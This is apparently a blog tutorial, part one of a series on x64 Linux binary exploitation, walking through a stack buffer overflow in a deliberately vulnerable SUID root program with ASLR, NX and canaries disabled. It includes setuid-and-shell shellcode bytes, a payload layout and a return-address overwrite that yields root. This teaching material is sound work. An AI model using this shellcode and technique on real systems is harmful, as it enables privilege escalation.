Introduction to x64 Linux Binary Exploitation (Part 1)

Jan 9, 2022

Basic Buffer Overflow (BoF)

This post is the first in a series of articles in which I will describe some basic x64 Linux binary exploitation techniques. We will begin with all the relevant mitigation mechanisms (ASLR, DEP/NX, stack canaries, etc.) disabled and create a simple BoF exploit, then gradually enable the protections one by one in order to understand how they can be bypassed and, most importantly, how they work.

As in all my previous posts, I will try to keep everything simple. If you have any questions, feel free to leave a comment and I’ll do my best to get an answer to you. Finally, I assume that you have a basic understanding of C, C++, assembly and memory management, as we need a starting point.

Before we start, you can use the links below to navigate to the other parts:

JMP to PART2 || PART3 || PART4 || PART5

Tools

We are going to perform most of our experiments on an Ubuntu Linux system, using a compiler (I am using gcc), GEF (GDB Enhanced Features) and a hex editor. You can use whichever compiler and debugger you prefer.

Basic concepts

What follows is a quick reference to some very basic concepts that will help you follow these tutorials. If you already know what a stack, a register or a buffer is, or how a function call takes place, you can JMP over the paragraphs below, or simply refresh your memory.

The application’s memory

As most of you probably know, when a program is executed the operating system creates a virtual address space for it to run in. This space is divided into segments which, among other things, hold the program’s instructions and the data it needs. More specifically, a segment called .text contains the program instructions, while .bss and .data contain the global variables. To be more precise, .bss holds the declared but uninitialised global variables, while .data holds the initialised ones.

Besides the segments mentioned above, this memory space contains the shared libraries (C, cap, dl, etc.), the heap and (finally) the stack. Whatever is dynamically allocated (e.g. with malloc, or with the new operator in C++ or Java) goes on the heap, while the stack is a LIFO (last in, first out) data structure that holds automatically allocated data such as local variables and return addresses. To get a visual representation of an application’s virtual memory you can take a look at the /proc/<process id>/maps file [1]:

In the picture above, the address field is the address range in the process that the mapping occupies. The perms field is a set of permissions: read (r), write (w), execute (x), shared (s) and private (p). The offset field is the offset into the file, dev is the device (major:minor), inode is the inode on that device, and finally the pathname field will usually be the file that is backing the mapping.
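To make the fields described above more concrete, here is a minimal Python sketch that splits one line of a maps file into those fields. The names Mapping and parse_maps_line are my own, and the sample line in the usage note is made up for illustration, so treat it as a sketch and not as a complete parser.

```python
from typing import NamedTuple


class Mapping(NamedTuple):
    start: int      # first address of the mapping
    end: int        # first address after the mapping
    perms: str      # e.g. "r-xp"
    offset: int     # offset into the backing file
    dev: str        # device as "major:minor"
    inode: int      # inode on that device (0 for anonymous mappings)
    pathname: str   # backing file, or "" if there is none


def parse_maps_line(line: str) -> Mapping:
    """Split one line of /proc/<pid>/maps into its fields."""
    # The pathname is optional and may contain spaces, so split at most 5 times.
    fields = line.split(maxsplit=5)
    addr, perms, offset, dev, inode = fields[:5]
    pathname = fields[5].strip() if len(fields) > 5 else ""
    start, end = (int(part, 16) for part in addr.split("-"))
    return Mapping(start, end, perms, int(offset, 16), dev, int(inode), pathname)


def read_own_maps():
    """Parse the mappings of the current process (Linux only)."""
    with open("/proc/self/maps") as maps:
        return [parse_maps_line(line) for line in maps]
```

For example, parse_maps_line("7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]") gives a mapping whose perms field is "rwxp" and whose pathname is "[stack]", which is roughly what you would expect to see for the stack of a binary built with an executable stack.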

The Registers

A processor register is a quickly accessible storage location inside the processor. If you are already familiar with the x86 (32-bit) architecture, you probably know that it provides, among others, eight general-purpose registers, six segment registers, the EFLAGS register and the EIP register, which holds the address of the next instruction to be executed.

The x64 architecture extends x86’s eight general-purpose registers to 64 bits and adds eight new 64-bit registers. The 64-bit registers have names beginning with “r”, so for example the 64-bit extension of eax is called rax. The new registers are named r8 through r15:

The Buffer

A buffer is defined as a limited, contiguously allocated region of memory. The most common buffer in C is an array [3]. Languages like C and C++ have no built-in mechanism to check the size of the data copied from one memory location to another, so the data may exceed the buffer’s capacity, and this is where serious problems occur.

“Sins of the father”
The C programming language has many “dangerous” functions that do not check bounds. These functions must be avoided, while in the unlikely event that they can’t, then the programmer must ensure that the bounds will never get exceeded. Some of these functions are the following:
strcpy, strcat, sprintf, vsprintf, gets
These should be replaced with functions such as strncpy, strncat, snprintf, and fgets respectively. The function strlen should be avoided unless you can ensure that there will be a terminating NIL character to find. The scanf family (scanf, fscanf, sscanf, vscanf, vsscanf, and vfscanf) is often dangerous to use [8].

Take a look at the example below:

On line 13 we define an array with 3 elements, while on line 14 we assign a value to a memory address outside the array. The compiler doesn’t give any warning, but when the program is executed we get the following error:

*** stack smashing detected ***: terminated

If the programmer designs code that copies user input into a buffer, it may be possible for a user to intentionally place more input into a buffer than it can hold. This can have a number of different consequences, everything from crashing the program to forcing the program to execute user-supplied instructions.
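The effect of such an unchecked copy can be illustrated with a toy model in Python. This is only a simulation under my own assumptions: the frame is a plain bytearray laid out as a 16-byte buffer, a saved RBP and a return address, and the names make_frame, unchecked_copy and saved_return_address are hypothetical. No real stack is involved.

```python
import struct

BUF_SIZE = 16  # size of the simulated local buffer (arbitrary choice)


def make_frame(return_address: int) -> bytearray:
    """Toy stack frame: [buffer][saved RBP][return address], low to high addresses."""
    saved_rbp = struct.pack("<Q", 0x7FFFFFFFE000)   # made-up value
    return bytearray(BUF_SIZE) + saved_rbp + struct.pack("<Q", return_address)


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of the buffer without checking BUF_SIZE (like strcpy)."""
    frame[0:len(data)] = data


def saved_return_address(frame: bytearray) -> int:
    """Read back the 8-byte return address stored after the buffer and saved RBP."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


frame = make_frame(0x401136)
unchecked_copy(frame, b"A" * BUF_SIZE)                  # fits: nothing else is touched
intact = saved_return_address(frame)                    # still 0x401136
unchecked_copy(frame, b"A" * (BUF_SIZE + 8) + struct.pack("<Q", 0xDEADBEEF))
hijacked = saved_return_address(frame)                  # now 0xDEADBEEF
```

The second copy is 16 bytes longer than the buffer, so it runs over the saved RBP and replaces the return address with a value chosen by whoever supplied the data.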

Function Calls

When a function is called, the compiler uses a stack frame (allocated within the program’s runtime stack) in order to store all the temporary information that the function requires to operate. Depending on the calling convention, the caller will place this information in specific registers, on the program stack, or in both. For example, under the System V AMD64 calling convention used for C code on x64 Linux, the first six integer or pointer arguments are placed in the RDI, RSI, RDX, RCX, R8 and R9 registers and anything additional is placed on the stack. Let’s see a simple example in order to understand this. The myfunc below takes 8 parameters:

https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64

According to what we said before, when the function is called its stack frame will be as follows:

As expected, the first six arguments are passed in the registers mentioned above, while the last two, g and h, are “spilled” onto the stack. The stack frame also holds the return address, the saved RBP, the local variables and a mysterious red zone which, according to the AMD64 ABI, is defined as follows:

The 128-byte area beyond the location pointed to by %rsp is considered to be reserved and shall not be modified by signal or interrupt handlers. Therefore, functions may use this area for temporary data that is not needed across function calls. In particular, leaf functions may use this area for their entire stack frame, rather than adjusting the stack pointer in the prologue and epilogue. This area is known as the red zone.
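Going back to the argument passing described above, the split between registers and stack can be sketched in a few lines of Python. The helper name place_args is my own, and the sketch only models integer or pointer arguments (floating point values use a different set of registers).

```python
# Registers used, in order, for the first six integer/pointer arguments
# on x64 Linux.
INT_ARG_REGS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")


def place_args(names):
    """Return (register assignment, stack arguments) for a list of argument names."""
    names = list(names)
    in_registers = dict(zip(INT_ARG_REGS, names))
    # Whatever does not fit in the six registers is passed on the stack.
    on_stack = names[len(INT_ARG_REGS):]
    return in_registers, on_stack


regs, stack = place_args("abcdefgh")
# regs  -> a in rdi, b in rsi, c in rdx, d in rcx, e in r8, f in r9
# stack -> g and h
```

The stack arguments are pushed from right to left, so h is pushed first and g ends up at the lower address, right above the return address.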

There are many other calling conventions (stdcall, fastcall, thiscall), each defining its own rules on where the caller should place the parameters that the called function requires [2]. For our purposes, though, what matters most is that besides the parameters the stack frame contains the return address, where execution will continue after the called function exits.

Under specific conditions it is possible to overwrite the return address and take control of the program’s execution.

Canonical Addresses

While 64-bit processors have 64-bit wide registers, systems generally do not implement all 64 bits for addressing. Thus most architectures define an unimplemented region of the address space which the processor considers invalid. According to the Intel and AMD documentation, in 64-bit mode only 48 bits are actually available for virtual addresses, and bits 48 to 63 must replicate bit 47 (sign extension). Take a look at the memory mapping below to see how this concept applies:

The overwritten address has to be canonical, or else it will be considered invalid and the redirection will fail.

For those familiar with x86 BoF exploitation, this means that an overwrite like 0x4141414141414141 (0x41 is the ASCII value of “A”) will simply fail.
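The rule is easy to check in code. Here is a minimal sketch, assuming the 48-bit virtual addresses described above; the function name is_canonical is my own.

```python
def is_canonical(addr: int, va_bits: int = 48) -> bool:
    """True if bits va_bits..63 of a 64-bit address all replicate bit va_bits - 1."""
    if not 0 <= addr < 1 << 64:
        raise ValueError("not a 64-bit address")
    upper = addr >> (va_bits - 1)               # bit 47 and everything above it
    all_ones = (1 << (64 - va_bits + 1)) - 1    # 17 set bits for va_bits = 48
    return upper == 0 or upper == all_ones


checks = {
    hex(addr): is_canonical(addr)
    for addr in (0x4141414141414141, 0x00007FFFFFFFDE18, 0xFFFF800000000000)
}
```

With these inputs the classic 0x4141414141414141 overwrite is rejected, while a typical user space stack address such as 0x7fffffffde18 and a kernel space address such as 0xffff800000000000 are both canonical.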

A vulnerable program

I’ll get straight to the point here… our vulnerable program has the SUID permission (Set owner User ID upon execution), it is owned by the root user and it is vulnerable to a buffer overflow. When it comes to functionality, it doesn’t do much besides printing “Hi there <name>”, where the name is given as a command line parameter:

Running something like ./vuln Dimitrios will print Hi there Dimitrios !! and that’s all.

Disabling Canary, ASLR, NX, FORTIFY_SOURCE

Before we start exploiting this piece of code, we first have to compile it, and we will use the following command for that:

$gcc -fno-stack-protector vuln.c -o vuln -z execstack -D_FORTIFY_SOURCE=0

In the command above, vuln.c is the C file where we wrote our code and vuln is the name of the final executable. The -fno-stack-protector flag disables the canary protection, -z execstack disables the NX (no-execute) protection on the stack, and -D_FORTIFY_SOURCE=0 disables buffer overflow detection for functions that perform operations on memory and strings [7]. In order to disable ASLR run the following command:

$sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'

Finally, use chown and chmod to change the owner to root and set the SUID permission:

#chown root vuln; chmod +s vuln

Smashing the stack

Why is this program vulnerable?

Because it “blindly” copies the user input to a buffer defined in the function greet_me. By blindly I mean that it doesn’t perform any size checks: since we use strcpy, it is our responsibility (as developers) to make sure that the destination buffer is large enough to store the copied string. Our buffer is 200 bytes long, so let us see how the program behaves with inputs around that size. Some Linux kung fu mixed with some Python will do the trick:

$ for i in {200..210}; do echo using $i bytes; python -c "print('A' * $i)" > payload; ./vuln $(cat payload) > /dev/null; done;

The one-liner above supplies a string of length $i (200 to 210) to our vulnerable program, and since we don’t care about the actual output we send it to /dev/null (how convenient). Error messages, though, are still printed to the terminal, so after a few iterations we have the following output:

This means that 209 bytes (if we include the new line ‘\x0a’) were enough to overflow the name buffer and cause a segmentation fault. Note that $(cat payload) strips the trailing new line, so the program itself receives 208 “A” characters, to which strcpy appends a terminating NUL byte. The payload that caused this error is the following:

Exploiting the vulnerability

Up to this point we identified that the program has a buffer overflow vulnerability. Our next step is to exploit this vulnerability and in order to do that we have to do the following:

1. Find the exact payload size: remember from the “Function Calls” paragraph that the stack frame of the vulnerable function should be similar to the one below. The return address comes right after the saved RBP:

So, we have to find the exact payload size that will overwrite the saved RBP.

2. Inject some shellcode that fits our needs (typically one that runs a shell)

3. Redirect the code execution to the location where our shellcode is saved in the memory.

We will use GEF once again to perform these steps. Starting from (1), load the binary and set a breakpoint on the main function:

We are going to use gef’s pattern create in order to create a specially crafted input which will help us identify the exact size of input that overwrites RBP:

Save this pattern to our payload file (use echo -n to omit the new line), and run the program (inside gdb) using the command:

gef> r $(cat payload)

Let gdb hit our breakpoint and type “disas greet_me” to disassemble the greet_me function:

Set a new breakpoint on the “ret” instruction using the b *address command (in my case it will be gef> b *0x00005555555551d5) and let the execution continue by issuing the ‘c’ command.

When execution hits the second breakpoint you should see something like this:

The RBP register (highlighted in white) in the figure above has been overwritten with the value “baaaaaab”. To find the exact offset of this value issue the pattern search baaaaaab command:
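To see why a pattern makes this search possible, here is a minimal Python sketch of the idea: generate a sequence in which every 8-byte window is unique, then look up where a given window starts. It uses a standard de Bruijn generator over lowercase letters; the function names are my own and the exact characters may differ from what GEF produces, so use it to understand the technique and not as a drop-in replacement.

```python
from itertools import islice
import string


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence in which no length-n window repeats."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern_create(length, n=8):
    """Return the first `length` characters of the pattern (n = window size)."""
    return "".join(islice(de_bruijn(string.ascii_lowercase, n), length))


def pattern_search(pattern, needle):
    """Return the offset at which `needle` starts, or -1 if it is not found."""
    return pattern.find(needle)


pattern = pattern_create(300)
# Pretend these 8 bytes were found in RBP after the crash.
seen_in_rbp = pattern[208:216]
offset = pattern_search(pattern, seen_in_rbp)
```

Because each window occurs only once, the 8 bytes that land in a register identify a single position in the input, which is exactly the offset we are after.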

So, 208 bytes are needed to reach the saved RBP and 8 more (216 in total) to overwrite it; the return address starts right after that. The next step is to inject the shellcode. While you may write your own, for this tutorial you can simply find one online, or borrow the one below:

\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05

The shellcode above calls setuid(0) and then spawns a shell, which is exactly the functionality we need since we are dealing with a SUID program. Let us now write a simple Python script which will “write down” what we have so far:

NOP simply means “no operation” in assembly, so when the CPU encounters one it does nothing and moves on to the next instruction. The NOPs will be used to “smoothly” slide execution into the next byte array, the shellcode. Please notice the following:

nops + shellcode + buf = 216 bytes
rip = 6 bytes (that are going to overwrite the saved return address and end up in the RIP register).
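A minimal sketch of such a layout is shown here. The NOP count (100), the “B” filler byte and the helper name build_payload are my assumptions; only the 216-byte offset, the 6-byte “C” placeholder and the shellcode bytes come from the steps above.

```python
OFFSET_TO_RET = 216  # bytes from the start of the buffer to the return address

SHELLCODE = (
    b"\x48\x31\xff\xb0\x69\x0f\x05"
    b"\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
    b"\x48\xc1\xeb\x08\x53\x48\x89\xe7"
    b"\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
    b"\x6a\x01\x5f\x6a\x3c\x58\x0f\x05"
)


def build_payload(nop_count: int = 100, rip: bytes = b"C" * 6) -> bytes:
    """Lay out nops + shellcode + buf (216 bytes) followed by the rip bytes."""
    nops = b"\x90" * nop_count
    filler_len = OFFSET_TO_RET - len(nops) - len(SHELLCODE)
    if filler_len < 0:
        raise ValueError("NOP sled and shellcode do not fit before the return address")
    buf = b"B" * filler_len
    return nops + SHELLCODE + buf + rip


payload = build_payload()
```

Writing the result to the payload file in binary mode lets you feed it to the program with r $(cat payload) as before. None of the bytes is a NUL, which matters because a NUL would end the command line argument and stop strcpy early.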

Run the program once again in gdb and, when it hits the second breakpoint, issue the following command (in order to examine the stack):

Our NOP sled starts at 0x7fffffffde18
The stack pointer points to the CCCCCC sequence:

The instruction pointer as well as our breakpoint is at 0x00005555555551d5

What will happen in the next step is that the value the stack pointer points to will be popped off the stack and loaded into the instruction pointer. Verify this by performing a single step:

$rip points to 0x434343434343 == CCCCCC address

What is left is to overwrite $rip with the right address, which will be the start of our NOP sled (0x7fffffffde18). In order to do that we will use the pack function of Python’s struct module. Our final exploit will look as below:
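As a minimal sketch of the packing step alone (not the complete exploit), the address can be converted to the 6 little-endian bytes that replace the “C” placeholder. The helper name pack_return_address is my own.

```python
import struct


def pack_return_address(addr: int) -> bytes:
    """Return the 6 low-order bytes of a user space address, little-endian."""
    packed = struct.pack("<Q", addr)            # 8 bytes, least significant first
    if packed[6:] != b"\x00\x00":
        raise ValueError("the two most significant bytes must be zero")
    return packed[:6]


rip = pack_return_address(0x7FFFFFFFDE18)
```

Only 6 bytes are written because the two most significant bytes of a user space address are zero: they cannot be passed in a command line argument, and they are already zero in the original return address, with strcpy’s terminating NUL landing on the first of them.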

Achieving root privileges is just a command away:

Summary

In this part I demonstrated the exploitation of a simple buffer overflow vulnerability on a Linux x64 system, which elevated my privileges to those of the root user. As mentioned in the beginning, all protection mechanisms were disabled for the sake of simplicity.

In the next parts I will start enabling these protections and try to bypass them, in order to achieve similar results.